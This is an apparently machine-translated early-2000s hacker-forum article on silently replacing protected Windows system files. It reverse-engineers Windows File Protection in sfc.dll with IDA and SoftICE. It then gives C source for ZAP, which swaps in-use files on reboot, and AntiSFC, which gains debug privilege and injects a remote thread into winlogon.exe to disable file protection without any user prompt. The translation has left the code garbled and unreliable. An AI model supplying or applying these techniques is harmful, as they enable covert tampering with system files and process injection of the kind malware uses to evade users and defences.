Create time: 2004-02-29 Article properties: Original article Submitted: bgate (bgate_at_163.com)
Author: bgate Mail: t2di4u@hotmail.com (not to be used to find id really is not an easy task):
Always have a little more than a little. In addition, in Antockethed two years, the water actually in Angocwell documents, I can't find my name. I can't put the essence post, I can't reply to the essence of others. Also Calculate is a miracle.
To replace the system files in use quietly To solve two problems: 1. Replace the file being used. 2. Dialog box that does not display the CD when replacing the system file.
Microsoft has two tools to replace the files, zap, and inuse that are being used. However, there is no source code, but it has to be reversely analyzed. Inuse is more 40K, Zap is small 7k. Analyze ZAP.
Use IDA to open ZAP. There is a core function. It turns out that its working principle is to move this file down, because it is simply applied directly to the code.
------------------- Cut zap.c --------- # include
Bool zapdelfile (char * szfiletodel) {char ctempFileName [0x80]; char ctemppathname [0x100]; char cfilename [0x100];
IF (SZFileTodel [1] == ') {sprintf (cTemppathname, "% C: //", SZFileTodel [0]);} else {getModuleFileName (null, cfilename, 0x100); sprintf (ctemppathname, "% C : // "CFILENAME [0]);
IF (CTEMPFILENAME (CTemppathname, "_ @", 0, ctempFileName) == 0) {Return False;}
IF (MovefileEx (SzfileTodel, CTempFileName, 1) == 0) {Return False;}
IF (MovefileEx (ctempFileName, NULL, 4) == 0) {Return False;}
Return True;}
Void usage (char * n) {printf ("usage:% s fileneedtodel / n", n); exit (0);
INT Main (int Argc, char * argv []) {
Printf ("ZAP programd by bgate. :) * / n / n");
IF (argc! = 2) USAGE (Argv [0]);
IF (zapdelfile (argv [1]) == true) {printf ("ok");} else {printf ("ERROR% D", getLastError ());} return 0;}
------------------- End cat -----------
Now you can use it to delete the system file being used, but you will pop up the Windows CD dialog box after delete. Note: Before deleting the system file before restarting before restarting, you need to delete the system file Remove the corresponding backups in Dllcache. Otherwise, the system will automatically recover.
I would like to go to this dialog, I took out my magic weapon - Google. Search for two useful information. 1. The code to execute the system file protection under SFC.dll under SFC.DLL under SFC.dll under SFC.dll Under the system in SFC_OS.DLL. 2. Set a key to the sfcdisable in the registry to fffffff9d to make the file protection function when the file protection function will be invalid when starting. The following analysis is on Win2K SP4 . SFC.dll Version 5.0.2195.6673
Open with ida sfc.dll find sfcdisable in the string, the string did not find a way to display Unicode This time to find a place to see SfcDisable reference code is as follows .text:!... 769269F9 call _SfcQueryRegDwordWithAlternate @ 16; SfcQueryRegDwordWithAlternate (x, x, X, x) .text: 769269fe Push Ebx.text: 769269ff push offset ?? _ c @ _1bg @ hogg @? $ AAS? $ AAF? $ AAAF? $ AAD ?; "sfcdisable" .text: 76926a04 push Edi.Text: 76926A05 push esi.text: 76926A06 mov _SFCDebug, eax.text: 76926A0B call _SfcQueryRegDwordWithAlternate @ 16; SfcQueryRegDwordWithAlternate (x, x, x, x) .text: 76926A10 push ebx.text: 76926A11 push offset ?? _ C @ _1BA @ HLJH @ $ AAS? $ AAF? $ AAAA? $ AAA? $ AAA? $ Aan? $ AA? $ AA @; "sfcscan" .text: 76926a16 Push Edi.Text: 76926a17 Push ESIT: 76926A18 MOV _SFCDISABLE , eax.text: 76926a1d call _sfcQueryregdwordwithalternate @ 16; sfcqueryregdwordwithalternate (x, x, x, x ) .Text: 76926a22 Push EBX.TEXT: 76926A23 PUSH OFFSET ?? _ C @ _1bc @ Kfaj @? $ AAS? $ AAF? $ AAO $ AAQ $ AAU? $ AAO $ AAT? $ AAA? $ aa? $ AA @; "sfcquota" .Text: 76926a28 push edi.text: 76926a29 push eSITEXT: 76926A2A MOV _SFCSCAN, EAX
Where _sfcqueryregdwordwithalternate @ 16 is a function of reading the registry. It is obvious that it reads the value of sfcdisable in the registry _SFCDISABLE. Ok, call up Softice. Set breakpoint on _sfcdisable. We have just written ZAP Go to delete the system file, Softice popped up. Disaddes the following place, EIP is 7692A326, _sfcdisable is 2..TEXT: 7692A319 PUSH ECX.TEXT: 7692A31A And [ESP 4 VAR_4], 0.Text: 7692A31F CMP _SFCDISABLE , 3.text: 7692A326 push ebx.text: 7692A327 push ebp.text: 7692A328 push esi.text: 7692A329 push edi.text: 7692A32A jnz short loc_7692A333.text: 7692A32C xor eax, eax.text: 7692A32E jmp loc_7692A459 F5 exit, After a while, the dialog fell out, I cited it once. Very good, look at the code "CMP _SFCDISABLE, 3" above. At this time _sfcdisable is 2, then I will change it to 3 Try with ZAP to delete the system file. Ha, luck is very good, this time did not have a dialog box for the CD. That is to say as long as we change the _sfcdisable to 3, it can sneak the system files. However, different versions The address is different, and this is always not good to use Switch. I have to write a universal code. Start I thinking it is probably Winlogon discovered that there is a system file to operate. Call SFC.dll The output function is checked. We just need to get this output function entry and turn this function "annotation". Follow the above code backward, find the last output from 76924544 At 76924544, add a breakpoint, continue to delete the file. Softice jumped out, but not in the entrance of the function, but in turn on the _sfcdisable reading, the entrance to the function is running in the function body. The code seems to have encountered a high person. I have to force me to kill the skill, open the 2000 source code:). I haven't found the corresponding code and I have to return it to see the compilation, and finally I found this function ntwaitformultipleObjects...................................... No interrupt on the entrance to the function, the entrance to the function was run, and then did not quit in the function body. The method of the comment function is not.
At this time, I thought it was probably the output function in Winlogon called SFC.dll created a series of events when the system was started. Since Winlogon created, then it should be revoked. Use Depends to open Winlogon. Sure, from SFC. Two functions were entered in the DLL. One is the one of the analysis, created a series of events. Take a look at the other, the output address is 76926869, no effort, close a series of events. Now we just want to invoke the code call into Winlogon "Another" function will cancel the file protection function. But Winlogon cannot inject the code. 26A Magazine sixth issue There is an article mentioned injecting: "Adjust Debugger Access Rightz to Our Process". That is a sfcdisable Article, the method he uses is to search for signatures in memory, then modify. Generality should not be so good.
The following injection method is to copy from the Crazylord code, but the method is not. :), it is too lazy to check it after writing, and the level is limited, and the elegant place will look at it.
----------------- Cut Antisfc.c ----------- # include
Typedef void (_stdcall * closeevents) (void); typef unsigned long dword; typef dword anti-dword;
/ ** Antisfc structures * /
Typedef struct _antisfc_process {dword pid; // process pid handle processhandle; // process handle char imagename [max_path]; // image name (not full path)} Antisfc_process, * Pantisfc_Process;
__inline void errorMessageBox (Char * Szadditioninfo) {Printf ("Error On% S, Error Code% D. / N", Szadditioninfo, getLastError ());}
Void usage ("USAGE:% s [/ d] / n", n); Printf ("/ t / d: disable sfc file protecte fuction./n"); exit (0); }
DWord init () {dWord Ret = 0; handle htokeen; Luid SedebugNameValue; Token_Privileges TKP;
IF (!! ") {ErseSstoken (" openprocessToken ";} else};} else {
IF (!, se_debug_name, & sedebugnamevalue) {ErrorMessageBox ("LookUpprivileGeValue);} else {
Tkp.privilegegount = 1; tkp.privileges [0] .luid = sedebugnameValue; tkp.privileges [0] .attributes = se_privilege_enable
IF (! AdjustTokenprivileges (Htoken, false, & tkp, null) {ErrorMessageBox ("AdjustTokenprivileges");} else {ret = 1;}} closehandle (htokeen);
Return (RET);
DWORD GetPidEx (char * proc_name, char * full_path) {DWORD dwPid = 0; HANDLE hSnapshot; PROCESSENTRY32 pe; BOOL Ret; if (isdigit (proc_name [0])) dwPid = strtoul (proc_name, NULL, 0); else dwPid = -1; hSnapshot = CreateToolhelp32Snapshot (TH32CS_SNAPPROCESS, 0); if (hSnapshot == (HANDLE) -1) {ErrorMessageBox ( "CreateToolhelp32Snapshot"); return (0);} pe.dwSize = sizeof (PROCESSENTRY32); Ret = Process32First ( HSnapshot, & PE
While (RET) {IF ((strncmp (strlwr (pe.szexefile), strlwr (proc_name) == 0) || (pe.th32processid == dwpid) {dwpid = pe.th32processid; strcpy (full_path, pe.szexefile); Break;} pe.dwsize = sizeof (Processentry32); RET = process32next (hsnapshot, & pE);}
CloseHandle (HSNAPSHOT); if (dwpid == -1) dwpid = 0; return (dwpid);}
DWORD INITPROCESS (Pantisfc_Process Process, Char * Proc_name, Antisfc_Access Access) {dword Ret = 0;
Process-> pid = getpidex (proc_name, process-> imagename); if (Process-> PID! = 0 && process-> imagename [0]! = 0) {process-> processhandle = OpenProcess (Access, False, Process- > PID); if (process-> processhandle == null) ErrorMessageBox ("openprocess"); else ret = 1;}
Return (RET);
DWORD INJECTTHREAD (PVOID FUNCTION) {Handle Hthread; DWORD DWTHREADPID = 0, DWSTATE
hThread = CreateRemoteThread (Process-> ProcessHandle, NULL, 0, (DWORD (__stdcall *) (void *)) function, NULL, 0, & dwThreadPid); if (hThread == NULL) {ErrorMessageBox ( "CreateRemoteThread"); goto cleanup DWSTATE = WaitForsingleObject (hthread, 4000); // Attends 4 seconds
Switch (dWState) {copy wait_timeout: Case Wait_failed: ErrorMessageBox ("WaitForsingleObject"); goto cleanup;
Case Wait_Object_0: Break;
Default: ErrorMessageBox ("WaitforsingleObject"); goto cleanup;}
CloseHandle (hthread); Return DWTHREADPID; Cleanup: CloseHandle (HTHREAD);
Return 0;}
INT Main (int Argc, char * argv []) {antisfc_process process; hmodule hsfc; dword dwthread; closeevents pfncloseevents; dword dWversion;
Printf ("Antisfc programd by bgate. :) * / n / n");
IF (argc! = 2) USAGE (Argv [0]);
IF (strcmp (argv [1], "/ d")! = 0) {USAGE (Argv [0]);}
IF (INIT ()) {Printf ("Debug Privilege Set / N");} else {printf ("Error On Get Debug Privilege / N); Return (0);}
IF (INTPROCESS, "WINLOGON.EXE", Process_all_access) == 0) {Printf ("Error On get Process Info. / N"); Return (0);}
DWVersion = getVersion (); if ((DWORD)) == 5) {// Windows 2000 / XP IF ((DWORD)) == 0) { // Windows 2000 HSFC = LoadLibrary ("sfc.dll"); Printf ("Win2000 / N");} else {// ix ((DWORD)) = 1) // Windows XP HSFC = LoadLibrary ("sfc_os.dll"); Printf ("Windows XP / N");}}}} // Else IF () // 2003? Else {Printf ("unsupported version / n");} PfnCloseevents = (Closeevents GetProcaddress (HSFC, MakeintResource (2)); if (PfnCloseevents == Null) {Printf ("Load the sfc fuction failed / n"); FreeELibrary (HSFC); Return (0);}
Freelibrary (HSFC);
DWTHREAD = INJECTTHREAD (& Process, PfnCloseevent); if (dwthread == 0) {Printf ("failed / n");} else {printf ("ok / n");}
CloseHandle (Process.ProcessHandle); Return (0);
}
------------------ End Cut --------- Running Antisfc before running the zap replacement system file, you can also write them together In theory, he can use any version of 2000, XP, 2003? But I only tested on Win2K SP4 , WinXP SP1 . The shortcomings of this article are that the replacement system file can only take effect after the restart, write.